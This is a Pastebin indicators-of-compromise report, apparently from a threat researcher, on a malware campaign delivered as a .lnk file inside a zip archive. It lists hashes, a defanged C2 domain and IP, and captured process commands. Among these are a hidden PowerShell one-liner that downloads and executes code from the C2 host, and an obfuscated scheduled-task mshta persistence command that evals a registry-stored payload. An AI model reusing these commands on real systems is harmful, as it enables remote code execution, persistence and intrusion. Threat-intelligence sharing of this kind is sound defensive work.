Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #LNK #powershell #fingerprinting #heavyobfuscated
- https://pastebin.com/s6ymr2x5
- attack_vector
- --------------
- email attach .lnk > powershell > get base64 > decode > fingerprint system
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460
- File name КМУ база даних.zip [Zip archive data, at least v2.0 to extract]
- File size 317.6 KB
- SHA-256 3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b
- File name sample.rtf.lnk [MS Windows shortcut, Item id list present, Points to a file or directory]
- File size 3.08 KB
- activity
- **************
- PL_SC = cdn1186{.} site/zG4roJ
- C2 = cdn1186{.} site/ua/news
- netwrk
- --------------
- 88.85.86.229 cdn1186{.} site GET /zG4roJ HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- 88.85.86.229 cdn1186{.} site POST /ua/news HTTP/1.1 noUA
- comp
- --------------
- powershell.exe 1544 TCP 88.85.86.229 80 ESTABLISHED
- proc
- --------------
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186{.} site/zG4roJ',$False);
- $cx.Send();$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')
- C:\Windows\system32\schtasks.exe /create /tn FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0} /sc hourly /mo 2 /tr "MsHTa.EXe 'JaVAsCRIpT:var pata='efada'; var naxe='ifero'; var dhf=new ActiveXObject('\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c');
- var GJj=dhf.RegRead('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso');eval(GJj);close();' "
- C:\Windows\system32\schtasks.exe /QUERY /FO CSV
- C:\Windows\system32\cmd.exe /c chcp 866 & SYSTEMINFO /FO CSV /NH 2>&1
- C:\Windows\system32\chcp.com
- C:\Windows\system32\systeminfo.exe /FO CSV /NH
- persist
- --------------
- Task Scheduler
- \FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0}
- Microsoft (R) HTML Application host
- Microsoft Corporation c:\windows\syswow64\mshta.exe 14.10.2013 7:50
- "MsHTa.EXe" "JaVAsCRIpT:var pata="efada"; var naxe="ifero";
- var dhf=new ActiveXObject("\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c");
- var GJj=dhf.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso");eval(GJj);close();"
- drop
- --------------
- n/a
- # # #
- https://www.virustotal.com/#/file/18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460/details
- https://www.virustotal.com/#/file/3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b/details
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement